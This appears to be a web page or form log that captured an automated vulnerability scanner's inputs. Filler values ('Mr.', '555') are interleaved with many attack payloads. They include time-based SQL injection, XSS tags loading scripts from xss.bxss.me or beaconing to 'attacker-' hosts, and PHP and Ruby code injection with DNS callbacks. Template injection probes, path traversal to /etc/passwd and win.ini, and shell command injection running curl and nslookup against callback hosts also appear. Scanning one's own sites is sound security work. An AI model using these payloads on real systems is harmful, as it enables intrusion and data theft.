Welcome

Mr.

555

Mr.

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

'.print(md5(31337)).'

Mr.

555

Mr.

${@print(md5(31337))}\

Mr.

555

Mr.

555

Mr.

${@print(md5(31337))}

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

".gethostbyname(lc("hitah"."tghfvxjab5483.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(87).chr(98).chr(89)."

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

'.gethostbyname(lc('hitan'.'idigbtmy02feb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(90).chr(115).chr(80).'

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(116).concat(79).concat(106).concat(73)+(require'socket'

Socket.gethostbyname('hitkf'+'lwqirfgne5738.bxss.me.')[3].to_s)+'

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

Mr.

555

${@print(md5(31337))}

555

";print(md5(31337));$a="

555

Mr.

555

Mr.

555

Mr.

555

555

Mr.

'+'A'.concat(70-3).concat(22*4).concat(114).concat(70).concat(112).concat(67)+(require'socket'

Socket.gethostbyname('hitcy'+'jokvtsjrb5a1b.bxss.me.')[3].to_s)+'

Mr.

555

555

Mr.

555

Mr.

${@print(md5(31337))}

Mr.

file:///etc/passwd

';print(md5(31337));$a='

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

".gethostbyname(lc("hitma"."qpismxke170b7.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(69).chr(116).chr(80)."

555

Mr.

555

Mr.

555

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

@@6aywE

��%2527%2522\'\"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1h9BXQ1oE')) OR 596=(SELECT 596 FROM PG_SLEEP(15))--

1Yswnrxfs') OR 259=(SELECT 259 FROM PG_SLEEP(15))--

1lrpMDsjJ' OR 178=(SELECT 178 FROM PG_SLEEP(15))--

1-1)) OR 851=(SELECT 851 FROM PG_SLEEP(15))--

1-1) OR 258=(SELECT 258 FROM PG_SLEEP(15))--

1-1 OR 866=(SELECT 866 FROM PG_SLEEP(15))--

1Pjukfy0i')); waitfor delay '0:0:15' --

1iPJ2Kybt'); waitfor delay '0:0:15' --

1KteTRwn0'; waitfor delay '0:0:15' --

1<aQtJdgi<

1<aFYfjur<

1<img sRc='http://attacker-9146/log.php?

1<img sRc='http://attacker-9198/log.php?

1<aLWjDUc x=9356>

1<anckKgP x=9926>

1<ifRAme sRc=9173.com></IfRamE>

1-1 waitfor delay '0:0:15' --

1<ifRAme sRc=9863.com></IfRamE>

1<WKOM6L>BCL15[!+!]</WKOM6L>

1<WOPH3S>EV8MQ[!+!]</WOPH3S>

1HrbLM

1qBgJy

1-1)); waitfor delay '0:0:15' --

1}body{zzz:Expre/**/SSion(VEwY(9115))}

<a HrEF=jaVaScRiPT:>

1}body{zzz:Expre/**/SSion(VpJF(9833))}

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=VEwY(9315)>

1-1); waitfor delay '0:0:0' --

�<img zzz onmouseover=VEwY(90281) //�>

1<ScRiPt>VEwY(9279)</sCripT>

1<input autofocus onfocus=VpJF(9242)>

1\u003CScRiPt\VEwY(9253)\u003C/sCripT\u003E

�<img zzz onmouseover=VpJF(99961) //�>

%31%3C%53%63%52%69%50%74%20%3E%56%45%77%59%289141%29%3C%2F%73%43%72%69%70%54%3E

1<ScRiPt>VpJF(9490)</sCripT>

1<img/src=">" onerror=alert(9973)>

1\u003CScRiPt\VpJF(9926)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%56%70%4A%46%289547%29%3C%2F%73%43%72%69%70%54%3E

1<img src=xyz OnErRor=VEwY(9456)>

1-1); waitfor delay '0:0:6.656' --

1<img src=//xss.bxss.me/t/dot.gif onload=VEwY(9746)>

1<img/src=">" onerror=alert(9173)>

1<body onload=VEwY(9966)>

1<img src=xyz OnErRor=VpJF(9003)>

1<img src=//xss.bxss.me/t/dot.gif onload=VpJF(9478)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9954'>

1<body onload=VpJF(9431)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9530'>

1<isindex type=image src=1 onerror=VEwY(9924)>

1-1); waitfor delay '0:0:15' --

1<isindex type=image src=1 onerror=VpJF(9435)>

1<svg

� onload=VpJF(9365);>

1<InvalidTag

>VpJF(9137)</ScRiPt>

1-1; waitfor delay '0:0:15' --

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9240></ScRiPt>

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9666></ScRiPt>

1<InvalidTag

>VpJF(9607)</ScRiPt>

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%56%45%77%59%28%39%31%34%37%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%56%70%4A%46%28%39%34%32%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>VEwY(9539)</script>9539

1<InvalidTag>VpJF(9572)</script>9572

1<InvalidTag>VEwY(9356)</script>

1<InvalidTag>VpJF(9361)</script>

1<W7IDDL>Z9SON[!+!]</W7IDDL>

1<WOMVGD>EO5UB[!+!]</WOMVGD>

1<InvalidTag >VEwY(9822)</ScRiPt>

1<InvalidTag >VpJF(9893)</ScRiPt>

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

1*if(now()=sysdate(),sleep(15),0)

bfgx2053%C0%BEz1%C0%BCz2a%90bcxhjl2053

<%={{={@{#{${dfb}}%>

bfg1594%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1594

bfgx10297%C0%BEz1%C0%BCz2a%90bcxhjl10297

19939256

bfg3373%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl3373

'"()&%<zzz><InvalidTag >VEwY(9681)</ScRiPt>

-1" OR 3*2>(0+5+399-399) --

19257814

-1" OR 3*2<(0+5+399-399) --

1'"()&%<zzz><InvalidTag >VEwY(9714)</ScRiPt>

-1" OR 3+399-399-1=0+0+0+1 --

'"()&%<zzz><InvalidTag >VpJF(9725)</ScRiPt>

-1" OR 2+399-399-1=0+0+0+1 --

1'"()&%<zzz><InvalidTag >VpJF(9652)</ScRiPt>

-1' OR 3*2>(0+5+31-31) or 'R0YZDsRm'='

-1' OR 3*2<(0+5+31-31) or 'R0YZDsRm'='

-1' OR 3+31-31-1=0+0+0+1 or 'R0YZDsRm'='

-1' OR 2+31-31-1=0+0+0+1 or 'R0YZDsRm'='

-1' OR 3*2>(0+5+416-416) --

-1' OR 3*2<(0+5+416-416) --

-1' OR 3+416-416-1=0+0+0+1 --

-1' OR 2+416-416-1=0+0+0+1 --

-1 OR 3*2>(0+5+196-196)

-1 OR 3*2<(0+5+196-196)

-1 OR 3+196-196-1=0+0+0+1

-1 OR 2+196-196-1=0+0+0+1

-1 OR 3*2>(0+5+115-115) --

Mr.

Http://bxss.me/t/fit.txt

Mr.

"+"A".concat(70-3).concat(22*4).concat(110).concat(70).concat(109).concat(76)+(require"socket"

555

Mr.

555

Mr.

555

echo hnibkd$()\ bgqklg\nz^xyu||a #' &echo hnibkd$()\ bgqklg\nz^xyu||a #|" &echo hnibkd$()\ bgqklg\nz^xyu||a #

555

../../../../../../../../../../../../../../etc/passwd

555

Mr.

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

'.gethostbyname(lc('hitrz'.'udjnqbaac9fd4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(86).chr(102).chr(72).'

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

555

Mr.

dfb{{98991*97996}}xca

1<InvalidTag>jIT2(9371)</script>9371

1<InvalidTag>jIT2(9060)</script>

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

1<WI7SDY>MES56[!+!]</WI7SDY>

1<InvalidTag >jIT2(9059)</ScRiPt>

<th:t="${dfb}#foreach

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

dfb[[${98991*97996}]]xca

<%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

bfgx10124%C0%BEz1%C0%BCz2a%90bcxhjl10124

bfg6571%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6571

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

19879699

'"()&%<zzz><InvalidTag >n185(9297)</ScRiPt>

<th:t="${dfb}#foreach

1'"()&%<zzz><InvalidTag >n185(9386)</ScRiPt>

<%={{={@{#{${dfb}}%>

bfgx8971%C0%BEz1%C0%BCz2a%90bcxhjl8971

bfg6968%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl6968

19175187

'"()&%<zzz><InvalidTag >jIT2(9120)</ScRiPt>

1'"()&%<zzz><InvalidTag >jIT2(9628)</ScRiPt>

Mr.

555

1<aSvTp1Z<

1<img sRc='http://attacker-9565/log.php?

Mr.

555

1<aEc0Ql1 x=9385>

1<ifRAme sRc=9114.com></IfRamE>

1<WRM0IQ>XB4LS[!+!]</WRM0IQ>

1TUut2

1}body{zzz:Expre/**/SSion(XgE2(9167))}

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<input autofocus onfocus=XgE2(9568)>

�<img zzz onmouseover=XgE2(96171) //�>

1<ScRiPt>XgE2(9114)</sCripT>

1\u003CScRiPt\XgE2(9830)\u003C/sCripT\u003E

%31%3C%53%63%52%69%50%74%20%3E%58%67%45%32%289048%29%3C%2F%73%43%72%69%70%54%3E

1<img/src=">" onerror=alert(9806)>

1<img src=xyz OnErRor=XgE2(9863)>

1<img src=//xss.bxss.me/t/dot.gif onload=XgE2(9265)>

1<body onload=XgE2(9855)>

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9816'>

1<isindex type=image src=1 onerror=XgE2(9634)>

1<svg

1<InvalidTag

1<InvalidTag/zzz src=//xss.bxss.me/t/xss.js?9567></ScRiPt>

1<InvalidTag

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%58%67%45%32%28%39%39%39%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

1<InvalidTag>XgE2(9186)</script>9186

1<InvalidTag>XgE2(9741)</script>

1<WHCZYV>FQMWH[!+!]</WHCZYV>

1<InvalidTag >XgE2(9192)</ScRiPt>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb${98991*97996}::.x

dfb[[${98991*97996}]]xca

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

19634704

bfgx8389%C0%BEz1%C0%BCz2a%90bcxhjl8389

bfg2305%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2305

'"()&%<zzz><InvalidTag >mTlX(9696)</ScRiPt>

19977192

1'"()&%<zzz><InvalidTag >mTlX(9708)</ScRiPt>

'"()&%<zzz><InvalidTag >XgE2(9303)</ScRiPt>

1'"()&%<zzz><InvalidTag >XgE2(9606)</ScRiPt>

1<a8f4Sad<

1<img sRc='http://attacker-9900/log.php?

1<asPFC7V x=9920>

1<ifRAme sRc=9461.com></IfRamE>

1<W97DID>RNAC5[!+!]</W97DID>

1<afZvHej<

1Dlhrt

1}body{zzz:Expre/**/SSion(nN1W(9740))}

1<img sRc='http://attacker-9583/log.php?

1<aQXJ5L6 x=9425>

<a HrEF=jaVaScRiPT:>

<a HrEF=http://xss.bxss.me></a>

1<ifRAme sRc=9119.com></IfRamE>

1<input autofocus onfocus=nN1W(9171)>

1<WWFIWR>QNTZO[!+!]</WWFIWR>

�<img zzz onmouseover=nN1W(90481) //�>

1<ScRiPt>nN1W(9992)</sCripT>

1xhrtk

1\u003CScRiPt\nN1W(9179)\u003C/sCripT\u003E

1}body{zzz:Expre/**/SSion(8UZ6(9713))}

%31%3C%53%63%52%69%50%74%20%3E%6E%4E%31%57%289536%29%3C%2F%73%43%72%69%70%54%3E

1<input autofocus onfocus=8UZ6(9250)>

1<img/src=">" onerror=alert(9299)>

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

1<InvalidTag>8UZ6(9304)</script>9304

dfb${98991*97996}::.x

1<InvalidTag>8UZ6(9282)</script>

1<WSON96>QHP5Y[!+!]</WSON96>

1<InvalidTag >8UZ6(9957)</ScRiPt>

dfb[[${98991*97996}]]xca

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

dfb{{98991*97996}}xca

dfb__${98991*97996}__::.x

dfb[[${98991*97996}]]xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

dfb{{98991*97996}}xca

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

<th:t="${dfb}#foreach

<%={{={@{#{${dfb}}%>

bfgx9260%C0%BEz1%C0%BCz2a%90bcxhjl9260

bfgx8216%C0%BEz1%C0%BCz2a%90bcxhjl8216

bfg1229%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1229

19318963

bfg1392%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl1392

'"()&%<zzz><InvalidTag >nN1W(9643)</ScRiPt>

19074711

'"()&%<zzz><InvalidTag >8UZ6(9577)</ScRiPt>

@@JRRNR

1'"()&%<zzz><InvalidTag >nN1W(9294)</ScRiPt>

��%2527%2522\'\"

1'"()&%<zzz><InvalidTag >8UZ6(9814)</ScRiPt>

'"

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1WG2zJbBv')) OR 371=(SELECT 371 FROM PG_SLEEP(15))--

1cwoEBWv4') OR 614=(SELECT 614 FROM PG_SLEEP(15))--

1V9p2eynn' OR 315=(SELECT 315 FROM PG_SLEEP(15))--

1-1)) OR 140=(SELECT 140 FROM PG_SLEEP(15))--

1-1) OR 917=(SELECT 917 FROM PG_SLEEP(15))--

1-1 OR 937=(SELECT 937 FROM PG_SLEEP(15))--

1l28y7LPY')); waitfor delay '0:0:15' --

1exDb7umu'); waitfor delay '0:0:15' --

1jjHyCmNA'; waitfor delay '0:0:15' --

1-1 waitfor delay '0:0:15' --

1-1)); waitfor delay '0:0:15' --

1-1); waitfor delay '0:0:15' --

1-1; waitfor delay '0:0:15' --

(select(0)from(select(sleep(15)))v)/'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"/

;(nslookup -q=cname hitttdhdnnzqj86a68.bxss.me||curl hitttdhdnnzqj86a68.bxss.me)|(nslookup -q=cname hitttdhdnnzqj86a68.bxss.me||curl hitttdhdnnzqj86a68.bxss.me)&(nslookup -q=cname hitttdhdnnzqj86a68.bxss.me||curl hitttdhdnnzqj86a68.bxss.me)

`(nslookup -q=cname hitpxvxzhdzgt36946.bxss.me||curl hitpxvxzhdzgt36946.bxss.me)`

|(nslookup -q=cname hithdfiyheeqv31c8c.bxss.me||curl hithdfiyheeqv31c8c.bxss.me)

WEB-INF\web.xml

WEB-INF/web.xml

&(nslookup -q=cname hitdhhgvbehpo4f990.bxss.me||curl hitdhhgvbehpo4f990.bxss.me)&'\"`0&(nslookup -q=cname hitdhhgvbehpo4f990.bxss.me||curl hitdhhgvbehpo4f990.bxss.me)&`'

10"XOR(1*if(now()=sysdate(),sleep(0),0))XOR"Z

&nslookup -q=cname hitrgncduummee093c.bxss.me&'\"`0&nslookup -q=cname hitrgncduummee093c.bxss.me&`'

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

$(nslookup -q=cname hitialooxbnwi7e422.bxss.me||curl hitialooxbnwi7e422.bxss.me)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

(nslookup -q=cname hitcacsxbtgsj445c4.bxss.me||curl hitcacsxbtgsj445c4.bxss.me))

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

10"XOR(1*if(now()=sysdate(),sleep(3),0))XOR"Z

|echo cmiuvm$()\ yhoxub\nz^xyu||a #' |echo cmiuvm$()\ yhoxub\nz^xyu||a #|" |echo cmiuvm$()\ yhoxub\nz^xyu||a #

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

&echo bcoiai$()\ xnrhkt\nz^xyu||a #' &echo bcoiai$()\ xnrhkt\nz^xyu||a #|" &echo bcoiai$()\ xnrhkt\nz^xyu||a #

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

echo jcizqs$()\ ckjkrc\nz^xyu||a #' &echo jcizqs$()\ ckjkrc\nz^xyu||a #|" &echo jcizqs$()\ ckjkrc\nz^xyu||a #

..\..\..\..\..\..\..\..\windows\win.ini

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z

/../../../../../../../../../../boot.ini

Mr.

555

../../../../../../../../../../windows/win.ini%00.jpg

./Mr.

555

C:\WINDOWS\system32\drivers\etc\hosts

../Mr.

555

555

555

file:///etc/passwd

'"()&%<zzz><InvalidTag >k1zC(9093)</ScRiPt>

1'"()&%<zzz><InvalidTag >k1zC(9129)</ScRiPt>

Mr.

../../../../../../../../../../../../../../windows/win.ini

Mr.

../../../../../../../../../../../../../../etc/passwd

1*if(now()=sysdate(),sleep(15),0)

'.print(md5(31337)).'

${@print(md5(31337))}\

Mr.

555

Mr.

555

bxss.me

555

Mr.

555

${@print(md5(31337))}

xfs.bxss.me

";print(md5(31337));$a="

';print(md5(31337));$a='

c:/windows/win.ini

555

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

Mr.

555

/etc/shells

555

Mr.

555

"+response.write(9714873*9107947)+"

'+response.write(9714873*9107947)+'

Mr.

555

http://bxss.me/t/fit.txt%3F.

555

response.write(9714873*9107947)

<!--

"||sleep(27*1000)*yozlog||"

-1" OR 3*2>(0+5+417-417) --

Mr.

555

Http://bxss.me/t/fit.txt

555

'+'A'.concat(70-3).concat(22*4).concat(111).concat(83).concat(111).concat(89)+(require'socket'

Socket.gethostbyname('hitgs'+'lbcswzooc50ce.bxss.me.')[3].to_s)+'

'||sleep(27*1000)*fnriqn||'

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.

555

19033258

-1" OR 3*2<(0+5+417-417) --

bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(120).concat(87).concat(115).concat(69)+(require"socket"

Socket.gethostbyname("hitzy"+"swapldfqfe671.bxss.me.")[3].to_s)+"

"&&sleep(27*1000)*yewcrd&&"

'"()&%<zzz><InvalidTag >k1zC(9055)</ScRiPt>

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.

555

HttP://bxss.me/t/xss.html?%00

-1" OR 3+417-417-1=0+0+0+1 --

WEB-INF\web.xml

Mr.

555

WEB-INF/web.xml

-1" OR 2+417-417-1=0+0+0+1 --

1'"()&%<zzz><InvalidTag >k1zC(9406)</ScRiPt>

'&&sleep(27*1000)*ifobwq&&'

Mr.

555

'"()

-1' OR 2+335-335-1=0+0+0+1 or 'PQSSpKBD'='

